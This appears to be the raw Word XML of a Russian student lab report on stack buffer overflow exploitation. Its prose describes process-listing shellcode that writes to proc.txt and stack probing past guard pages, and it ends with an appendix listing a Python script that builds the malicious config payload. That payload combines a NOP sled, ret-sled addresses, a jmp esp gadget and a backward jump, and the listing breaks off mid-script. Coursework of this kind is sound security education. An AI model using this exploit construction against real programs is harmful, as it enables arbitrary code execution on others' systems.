    </w:p>
    <w:p w14:paraId="3F689922" w14:textId="7985903B" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Особенностью данного шелл-кода является необходимость безопасного выделения большого объема памяти на стеке для хранения структур процессов и результирующей строки. Выделение производится блоками по 4 КБ (размер страницы) с обязательным обращением к памяти (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">), чтобы корректно пройти защитный механизм ОС </w:t>
      </w:r>
      <w:r w:rsidR="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7731D" w14:textId="55289643" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Для обхода ограничения консольных приложений и повышения стабильности эксплойта, вывод результатов осуществляется не в графическое окно, а напрямую в файл </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>proc.txt.</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для этого шелл-код дополнительно разрешает адреса функций </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CreateFileA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>WriteFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009627BF">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> После успешного формирования файла программа корректно завершает свою работу через вызов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C86FC" w14:textId="5ED1FA95" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="009627BF" w:rsidP="00437F53">
      <w:r>
        <w:t xml:space="preserve">Тестирование разработанного шелл-кода представлено на </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:instrText xml:space="preserve"> REF _Ref228808680 \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>исун</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ке</w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C43EB" w14:textId="2E013CD8" w:rsidR="007A28B2" w:rsidRDefault="007A28B2" w:rsidP="007A28B2">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D85BD7E" w14:textId="77777777" w:rsidR="009627BF" w:rsidRDefault="009627BF" w:rsidP="009627BF">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r w:rsidRPr="009627BF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272B225A" wp14:editId="21404EC0">
            <wp:extent cx="5940425" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="169427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8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3051" w14:textId="3E5B4AFE" w:rsidR="00B071AC" w:rsidRPr="009627BF" w:rsidRDefault="009627BF" w:rsidP="009627BF">
      <w:pPr>
        <w:pStyle w:val="affa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2" w:name="_Ref228808680"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF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9627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009627BF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Pr="009627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эксплуатация уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9C505" w14:textId="77777777" w:rsidR="00923DD7" w:rsidRPr="00EA5084" w:rsidRDefault="00923DD7" w:rsidP="00923DD7"/>
    <w:p w14:paraId="3F8E41ED" w14:textId="77777777" w:rsidR="00923DD7" w:rsidRPr="00EA5084" w:rsidRDefault="00923DD7" w:rsidP="00923DD7"/>
    <w:p w14:paraId="1507FD52" w14:textId="77777777" w:rsidR="00923DD7" w:rsidRPr="00EA5084" w:rsidRDefault="00923DD7" w:rsidP="00923DD7"/>
    <w:p w14:paraId="38AE7B44" w14:textId="4A1EB6D6" w:rsidR="00923DD7" w:rsidRPr="00EA5084" w:rsidRDefault="00923DD7" w:rsidP="00C52126">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA5084">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AB332" w14:textId="1EE07BAC" w:rsidR="009E0F43" w:rsidRPr="006426CC" w:rsidRDefault="002777C3" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7AB0CF" w14:textId="28BE3D07" w:rsidR="0035662C" w:rsidRPr="00A87CF9" w:rsidRDefault="0035662C" w:rsidP="00A87CF9">
      <w:pPr>
        <w:pStyle w:val="aff8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">были получены </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>практические навыки эксплуатации уязвимости переполнения буфера,</w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>передача адреса возврата по указанному адресу и выполнен код, встроенный в</w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>стек программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1421DA" w14:textId="2C6D04DF" w:rsidR="00457D40" w:rsidRPr="00051312" w:rsidRDefault="00457D40" w:rsidP="00457D40">
      <w:pPr>
        <w:pStyle w:val="afff4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EDF02E" w14:textId="45121667" w:rsidR="005F731C" w:rsidRPr="00457D40" w:rsidRDefault="005F731C" w:rsidP="00457D40">
      <w:pPr>
        <w:pStyle w:val="afff4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="573066B6" w14:textId="10A4436E" w:rsidR="00A67FDB" w:rsidRDefault="000A7974" w:rsidP="00656D19">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r w:rsidR="00656D19">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D85821" w14:textId="771975AE" w:rsidR="00C52126" w:rsidRDefault="00803F25" w:rsidP="00803F25">
      <w:pPr>
        <w:pStyle w:val="affffd"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Листинг программы «Создание конфигурационного файла с шелл-кодом»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2126" w:rsidRPr="00EB0E0A" w14:paraId="376A875E" w14:textId="77777777" w:rsidTr="00C52126">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439D228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import struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E415AC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import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2C44225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import subprocess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE6374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36E45AB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asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "shellcode.asm"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71780A5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bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>shellcode.bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2531CE3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02C05AA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subprocess.run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nasm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">", "-f", "bin", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, "-o", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>], check=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2862E0F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745CEF7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with open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5CB97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shellcode = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4424C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5D44E87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header = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bytearray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(b'\x00' * 48)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37974AB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header[0:4] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">('&lt;I', 10)     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42192EE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header[4:8] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">('&lt;I', 2499)   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2871F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header[8:12] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>('&lt;I', 2510)  # LSB Overwrite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A9C13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4067223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delimiter = b"/start"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F97944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051F756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align_pad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>b"A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>" * 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22E6D61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nops</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = b"\x90" * 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CAF1D2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34FD0B0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shellcode_block</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = shellcode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9CBA1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199B3D0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pad_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 2002 - (2 + 16 + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(shellcode))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7380EC0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pad2 = b"\x90" * </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>pad_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="33EB315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60CFBE9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ret_sled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>('&lt;I', 0x62501057) * 122</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCEF88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4B22095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jmp_esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>('&lt;I', 0x62501297)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CC6F4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04D68EA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jmp_back</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = b"\xE9\x4F\xF6\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>xFF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>xFF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362B60A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3926D0A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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>payload_body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>align_pad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nops</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>shellcode_block</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + pad2 + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ret_sled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>jmp_esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>jmp_back</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="211FCAD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5BB6A0E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payload = header + delimiter + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>payload_body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
